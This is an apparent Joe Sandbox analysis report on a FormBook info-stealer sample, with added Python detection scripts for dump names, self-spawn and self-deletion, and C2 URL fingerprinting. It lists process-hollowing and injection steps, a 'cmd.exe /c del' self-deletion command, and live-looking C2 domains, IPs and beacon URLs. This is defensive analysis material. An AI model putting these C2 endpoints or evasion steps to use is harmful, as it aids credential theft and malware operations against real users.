          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0391740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0391740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0391740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03860050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03860050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03902073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03911074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\WWAHost.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\DN_467842234567.exe | Code function: 1_2_00409B30 LdrLoadDll,

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.kxdrstone.com
          Source: C:\Windows\explorer.exe | Domain query: www.financecreditpro.com
          Source: C:\Windows\explorer.exe | Domain query: www.2377k.com
          Source: C:\Windows\explorer.exe | Domain query: www.portale-accessi-anomali.com
          Source: C:\Windows\explorer.exe | Network Connect: 5.9.90.226 80
          Source: C:\Windows\explorer.exe | Domain query: www.nurhalilah.xyz
          Source: C:\Windows\explorer.exe | Domain query: www.uscryptomininglaws.com
          Source: C:\Windows\explorer.exe | Domain query: www.healthcaresms.com
          Source: C:\Windows\explorer.exe | Network Connect: 104.21.11.163 80
          Source: C:\Windows\explorer.exe | Domain query: www.drive16pay.art
          Source: C:\Windows\explorer.exe | Network Connect: 35.246.6.109 80
          Source: C:\Windows\explorer.exe | Domain query: www.lottochain.bet
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe | Network Connect: 172.67.148.98 80
          Source: C:\Windows\explorer.exe | Domain query: www.smpldebts.com
          Source: C:\Windows\explorer.exe | Network Connect: 202.165.66.108 80
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\DN_467842234567.exe | Section unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 10D0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\DN_467842234567.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\DN_467842234567.exe | Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\DN_467842234567.exe | Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\WWAHost.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\WWAHost.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign process
          Source: C:\Users\user\Desktop\DN_467842234567.exe | Memory written: C:\Users\user\Desktop\DN_467842234567.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\DN_467842234567.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\DN_467842234567.exe | Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\WWAHost.exe | Thread register set: target process: 3424
          Source: C:\Users\user\Desktop\DN_467842234567.exe | Process created: C:\Users\user\Desktop\DN_467842234567.exe 'C:\Users\user\Desktop\DN_467842234567.exe'
          Source: C:\Windows\SysWOW64\WWAHost.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DN_467842234567.exe'
          Source: explorer.exe, 00000004.00000000.677442024.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.712289643.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 00000007.00000002.934906435.0000000006040000.00000002.00020000.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.712289643.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 00000007.00000002.934906435.0000000006040000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.712289643.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 00000007.00000002.934906435.0000000006040000.00000002.00020000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.712289643.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 00000007.00000002.934906435.0000000006040000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.700136697.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\DN_467842234567.exe | Code function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
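The memory-dump names in the two Yara lists above carry the region's base address and page protection in their dotted fields, which is how a reader can tell that the FormBook matches sit in RWX regions (the hollowed image at 0x400000, the copies at 0x560000 and 0x5D0000 in WWAHost.exe) versus the plain read/write heap buffer at 0xE920000 where the first stage decrypted it. The parser below is an added example, not Joe Sandbox code. The field layout `<process index>.<stage>.<dump id>.<base address>.<page protection>.<region type>` is an assumption inferred from the names on this page (the page does not document it), and the last field is kept raw for that reason; the protection values decode with the standard Windows PAGE_* constants from winnt.h.

```python
"""Decode Joe Sandbox-style memory dump file names from the Yara section.

Added example; not part of the sandbox report. The field layout
    <proc>.<stage>.<dumpid>.<base>.<protect>.<type>.sdmp
is an ASSUMPTION inferred from the names on the page, and the last field
is left undecoded because its meaning is not documented here.
"""
import re
from dataclasses import dataclass

# Standard Windows memory-protection constants (winnt.h).
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}

_DUMP_RE = re.compile(
    r"^(?P<proc>[0-9a-fA-F]{8})\.(?P<stage>[0-9a-fA-F]{8})\.(?P<dumpid>\d+)\."
    r"(?P<base>[0-9a-fA-F]{16})\.(?P<protect>[0-9a-fA-F]{8})\.(?P<rtype>[0-9a-fA-F]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    process_index: int   # index into the report's process list, not a PID
    stage: int
    dump_id: int
    base: int
    protect: int
    region_type: int     # kept raw; not decoded

    @property
    def protection_name(self) -> str:
        # Mask off PAGE_GUARD / NOCACHE modifiers (0x100 and up) before lookup.
        return PAGE_PROTECTIONS.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def is_writable_executable(self) -> bool:
        # RWX pages are the usual footprint of an unpacked or hollowed image.
        return (self.protect & 0xFF) in (0x40, 0x80)


def parse_dump_name(name: str) -> DumpRegion:
    """Split one dump file name into its fields; raises ValueError on a bad name."""
    m = _DUMP_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised dump name: {name!r}")
    return DumpRegion(
        process_index=int(m["proc"], 16),
        stage=int(m["stage"], 16),
        dump_id=int(m["dumpid"]),
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        region_type=int(m["rtype"], 16),
    )


def rwx_regions(names):
    """Return (name, base, protection) for every RWX dump in the list."""
    out = []
    for n in names:
        r = parse_dump_name(n)
        if r.is_writable_executable:
            out.append((n, r.base, r.protection_name))
    return out


# Dump names copied from the Yara section of this report.
REPORT_DUMPS = [
    "00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp",
    "00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp",
    "00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp",
    "00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp",
    "00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp",
]

if __name__ == "__main__":
    for name, base, prot in rwx_regions(REPORT_DUMPS):
        print(f"{name}: base=0x{base:X} {prot}")
```

Running it over the five names lists the three RWX regions (process index 7 at 0x560000, process index 4 at 0xF01F000, process index 1 at 0x400000) and skips the two PAGE_READWRITE buffers; the process index matches the leading number in the `1.2.DN_467842234567.exe.400000.0` unpack names.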

Mitre Att&ck Matrix

The digits after a technique name are the report's superscript signature counters and are reproduced as they appear; cells without a counter are the matrix's unmatched placeholders.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Virtualization/Sandbox Evasion 2 | OS Credential Dumping | Security Software Discovery 221 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 612 | LSASS Memory | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 4 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 12 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | File Deletion 1 | Cached Domain Credentials | System Information Discovery 13 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

Behavior Graph

Behavior Graph ID: 491743, Sample: DN_467842234567.exe, Start date: 27/09/2021, Architecture: WINDOWS, Score: 100

Sample-level nodes:
    DNS: www.byemreperde.com, www.21lawsofconfidence.com
    Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures

Process tree (a number in parentheses is the counter the graph shows on that node; the legend does not state whether it counts created files or registry values):
    DN_467842234567.exe (17), started
        Dropped file: C:\Users\user\AppData\Local\...\rcgwzvp.dll, PE32
        Signatures: Detected unpacking (changes PE section rights); Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
        DN_467842234567.exe, started (second instance of the sample)
            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
            explorer.exe, injected
                DNS/IP: www.drive16pay.art 202.165.66.108, ports 49863, 80, VPIS-APVADSManagedBusinessInternetServiceProviderMY, Australia
                DNS/IP: www.financecreditpro.com 5.9.90.226, ports 49839, 80, HETZNER-ASDE, Germany
                DNS/IP: 13 other IPs or domains
                Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
                WWAHost.exe, started
                    Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    cmd.exe (1), started
                        conhost.exe, started
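Two behaviours in the graph are cheap to detect from process-creation telemetry alone: the sample launching a second copy of its own image (the hollowing host), and a process later removing the original sample through `cmd.exe /c del`. The script below is an added example, not Joe Sandbox code. Its event records are constructed to mirror the tree above, and the field names pid, ppid, image and cmdline are assumptions to be mapped onto Sysmon event ID 1 or EDR process events.

```python
"""Detect two behaviours from the graph above using process-creation events only:
1. a process launching a second copy of its own image (hollowing host), and
2. cmd.exe /c del removing the image of a process seen earlier in the window.

Added example, not sandbox code. EVENTS is constructed to mirror the tree;
pid/ppid/image/cmdline are assumed field names (map from Sysmon EID 1 / EDR).
"""
import re

SAMPLE = r"C:\Users\user\Desktop\DN_467842234567.exe"

# Constructed events, shaped like the report's process tree.
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 11,  "ppid": 100, "image": SAMPLE,
     "cmdline": f"'{SAMPLE}'"},
    {"pid": 15,  "ppid": 11,  "image": SAMPLE,            # self-spawn: same image as parent
     "cmdline": f"{SAMPLE} '{SAMPLE}'"},
    {"pid": 22,  "ppid": 100, "image": r"C:\Windows\SysWOW64\WWAHost.exe",   # parent is the injected explorer.exe
     "cmdline": "WWAHost.exe"},
    {"pid": 25,  "ppid": 22,  "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": f"C:\\Windows\\SysWOW64\\cmd.exe /c del '{SAMPLE}'"},
    {"pid": 27,  "ppid": 25,  "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": "conhost.exe"},
]

# 'del', optional switches such as /q or /f, then a quoted or bare path.
_DEL_RE = re.compile(r"\bdel\b\s+(?:/[a-zA-Z]\s+)*['\"]?(.+?)['\"]?\s*$", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def deleted_path(cmdline: str):
    """Return the path a 'del <path>' command line removes, or None if it is not a del."""
    m = _DEL_RE.search(cmdline)
    return m.group(1) if m else None


def self_spawns(events):
    """Processes whose parent runs the same image path (hollowing-host pattern)."""
    by_pid = {e["pid"]: e for e in events}
    return [e for e in events
            if e["ppid"] in by_pid
            and by_pid[e["ppid"]]["image"].lower() == e["image"].lower()]


def self_deletions(events):
    """cmd.exe deletions whose target is the image of any process in the window.

    The match is deliberately NOT restricted to the deleter's ancestors: after the
    injection into explorer.exe, WWAHost.exe's parent is explorer.exe, so lineage
    alone would never connect the del back to the sample.
    """
    images = {e["image"].lower(): e["pid"] for e in events}
    hits = []
    for e in events:
        if _basename(e["image"]) != "cmd.exe":
            continue
        target = deleted_path(e["cmdline"])
        if target and target.lower() in images:
            hits.append({"deleter_pid": e["pid"], "deleter_ppid": e["ppid"],
                         "target": target, "target_pid": images[target.lower()]})
    return hits


if __name__ == "__main__":
    for e in self_spawns(EVENTS):
        print(f"self-spawn: pid {e['pid']} re-launched {e['image']}")
    for h in self_deletions(EVENTS):
        print(f"self-delete: cmd.exe pid {h['deleter_pid']} (parent {h['deleter_ppid']}) "
              f"removed {h['target']} (image of pid {h['target_pid']})")
```

On the constructed events this reports pid 15 as the self-spawn and the cmd.exe under WWAHost.exe as the deletion of the sample's image, which is the same pairing the report's "Sample uses process hollowing technique" and "Self deletion via cmd delete" signatures describe.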

Screenshots

[screenshot: windows-stand]

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
DN_467842234567.exe | 64% | ReversingLabs | Win32.Trojan.Swotter
DN_467842234567.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dll | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dll | 11% | ReversingLabs | Win32.Trojan.InjectorX

Unpacked PE Files

Source | Detection | Scanner | Label
1.1.DN_467842234567.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.2.DN_467842234567.exe.e920000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.0.DN_467842234567.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
7.2.WWAHost.exe.3d57968.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.2.DN_467842234567.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
1.0.DN_467842234567.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
1.2.DN_467842234567.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.2.WWAHost.exe.a398b0.0.unpack | 100% | Avira | TR/Patched.Ren.Gen

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.drive16pay.art/r95e/?5jTDyZ=hlNCb9FJCcnwseEpDycOVhynUMT+mMuln2sCiD+HHAGMht96K5ziw8KZ4U389UfCWXdM&l2M=TL00 | 0% | Avira URL Cloud | safe
http://www.2377k.com/r95e/?5jTDyZ=Bz2f4T/F+fkIMVoJU/amRd6ca64J0uSW6dugIGIPMe5NoTdXMzMXV3yFXHZPUv8ChFjS&l2M=TL00 | 0% | Avira URL Cloud | safe
http://www.lottochain.bet/r95e/?5jTDyZ=TgnCaJJuD0kHzauLDq/dXM7zvJjUq4JZJEpqJXalrHOYrpD3Izw002IN0NuSyeqNHOZT&l2M=TL00 | 0% | Avira URL Cloud | safe
www.bofight.store/r95e/ | 0% | Avira URL Cloud | safe
http://www.nurhalilah.xyz/r95e/?5jTDyZ=M4286+QNvZx8LKmy/UZnIHKCdMprwtwgM1NJPmpLuQigTfxCAf78NurDWqizjXHDX4ej&l2M=TL00 | 0% | Avira URL Cloud | safe
http://www.financecreditpro.com/r95e/?5jTDyZ=TvKiO4/QDjaQNmJvqYzYpGMovSyo6lhw1ZKWJ3cUrN1tKoZgxWwrK5KCn4028QL8xxrY&l2M=TL00 | 0% | Avira URL Cloud | safe
http://www.uscryptomininglaws.com/r95e/?5jTDyZ=BXQ0bbTmKEXRUVKMKrV3wGde7K0OnYr2R+4D0hwUDGvbHRTPKc91vtcYWtUAnnCzzr+p&l2M=TL00 | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Reputation
www.drive16pay.art | 202.165.66.108 | true | true | unknown
uscryptomininglaws.com | 34.102.136.180 | true | false | unknown
www.financecreditpro.com | 5.9.90.226 | true | true | unknown
www.2377k.com | 172.67.148.98 | true | true | unknown
td-balancer-euw2-6-109.wixdns.net | 35.246.6.109 | true | false | unknown
www.nurhalilah.xyz | 104.21.11.163 | true | true | unknown
www.healthcaresms.com | unknown | unknown | true | unknown
www.kxdrstone.com | unknown | unknown | true | unknown
www.21lawsofconfidence.com | unknown | unknown | true | unknown
www.lottochain.bet | unknown | unknown | true | unknown
www.byemreperde.com | unknown | unknown | true | unknown
www.portale-accessi-anomali.com | unknown | unknown | true | unknown
www.uscryptomininglaws.com | unknown | unknown | true | unknown
www.smpldebts.com | unknown | unknown | true | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.drive16pay.art/r95e/?5jTDyZ=hlNCb9FJCcnwseEpDycOVhynUMT+mMuln2sCiD+HHAGMht96K5ziw8KZ4U389UfCWXdM&l2M=TL00 | true | Avira URL Cloud: safe | unknown
http://www.2377k.com/r95e/?5jTDyZ=Bz2f4T/F+fkIMVoJU/amRd6ca64J0uSW6dugIGIPMe5NoTdXMzMXV3yFXHZPUv8ChFjS&l2M=TL00 | true | Avira URL Cloud: safe | unknown
http://www.lottochain.bet/r95e/?5jTDyZ=TgnCaJJuD0kHzauLDq/dXM7zvJjUq4JZJEpqJXalrHOYrpD3Izw002IN0NuSyeqNHOZT&l2M=TL00 | false | Avira URL Cloud: safe | unknown
www.bofight.store/r95e/ | true | Avira URL Cloud: safe | low
http://www.nurhalilah.xyz/r95e/?5jTDyZ=M4286+QNvZx8LKmy/UZnIHKCdMprwtwgM1NJPmpLuQigTfxCAf78NurDWqizjXHDX4ej&l2M=TL00 | true | Avira URL Cloud: safe | unknown
http://www.financecreditpro.com/r95e/?5jTDyZ=TvKiO4/QDjaQNmJvqYzYpGMovSyo6lhw1ZKWJ3cUrN1tKoZgxWwrK5KCn4028QL8xxrY&l2M=TL00 | true | Avira URL Cloud: safe | unknown
http://www.uscryptomininglaws.com/r95e/?5jTDyZ=BXQ0bbTmKEXRUVKMKrV3wGde7K0OnYr2R+4D0hwUDGvbHRTPKc91vtcYWtUAnnCzzr+p&l2M=TL00 | false | Avira URL Cloud: safe | unknown
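Every full URL in the table shares the path `/r95e/` and the two parameter names `5jTDyZ` and `l2M` with a fixed `TL00` value; only the host and the long blob change, because FormBook walks a list of decoy and real domains per beacon. Blocking hosts therefore buys little, while the constant path and parameter names are a usable campaign fingerprint. The script below is an added example, not Joe Sandbox code; the URLs are copied from the table above, the benign NSIS string from the binary is included as a negative case, and the 60-character minimum blob length is an assumption chosen to suppress accidental hits on short queries.

```python
"""Fingerprint the C2 URLs listed in this report by their constant parts.

Added example, not part of the sandbox report. The host rotates across
decoy and real domains, so path and parameter names are what the URLs share.
"""
from urllib.parse import urlsplit, parse_qsl

# URLs copied from the "Contacted URLs" table above; the last one is the
# benign NSIS string from the binary, included as a negative case.
URLS = [
    "http://www.drive16pay.art/r95e/?5jTDyZ=hlNCb9FJCcnwseEpDycOVhynUMT+mMuln2sCiD+HHAGMht96K5ziw8KZ4U389UfCWXdM&l2M=TL00",
    "http://www.2377k.com/r95e/?5jTDyZ=Bz2f4T/F+fkIMVoJU/amRd6ca64J0uSW6dugIGIPMe5NoTdXMzMXV3yFXHZPUv8ChFjS&l2M=TL00",
    "http://www.lottochain.bet/r95e/?5jTDyZ=TgnCaJJuD0kHzauLDq/dXM7zvJjUq4JZJEpqJXalrHOYrpD3Izw002IN0NuSyeqNHOZT&l2M=TL00",
    "http://www.nurhalilah.xyz/r95e/?5jTDyZ=M4286+QNvZx8LKmy/UZnIHKCdMprwtwgM1NJPmpLuQigTfxCAf78NurDWqizjXHDX4ej&l2M=TL00",
    "http://www.financecreditpro.com/r95e/?5jTDyZ=TvKiO4/QDjaQNmJvqYzYpGMovSyo6lhw1ZKWJ3cUrN1tKoZgxWwrK5KCn4028QL8xxrY&l2M=TL00",
    "http://www.uscryptomininglaws.com/r95e/?5jTDyZ=BXQ0bbTmKEXRUVKMKrV3wGde7K0OnYr2R+4D0hwUDGvbHRTPKc91vtcYWtUAnnCzzr+p&l2M=TL00",
    "http://nsis.sf.net/NSIS_Error",
]


def fingerprint(url: str):
    """(path, tuple of query parameter names, value of the last parameter).

    The first parameter's value is the per-beacon blob and is dropped; the
    last parameter carries a short constant, so it is kept.
    """
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    names = tuple(k for k, _ in params)
    tail = params[-1][1] if params else ""
    return (parts.path, names, tail)


def cluster(urls):
    """Group URLs by fingerprint; returns {fingerprint: [hostnames]}."""
    groups = {}
    for u in urls:
        groups.setdefault(fingerprint(u), []).append(urlsplit(u).hostname)
    return groups


def matches_campaign(url: str, path: str = "/r95e/",
                     param_names=("5jTDyZ", "l2M"), min_blob: int = 60) -> bool:
    """True when a URL has the campaign's path and parameter names, whatever the host.

    min_blob (an assumed threshold) filters out accidental hits on short queries.
    """
    parts = urlsplit(url)
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    return (parts.path == path
            and tuple(params) == param_names
            and len(params[param_names[0]]) >= min_blob)


if __name__ == "__main__":
    for fp, hosts in cluster(URLS).items():
        print(fp, "->", hosts)
    for u in URLS:
        print(matches_campaign(u), u[:60])
```

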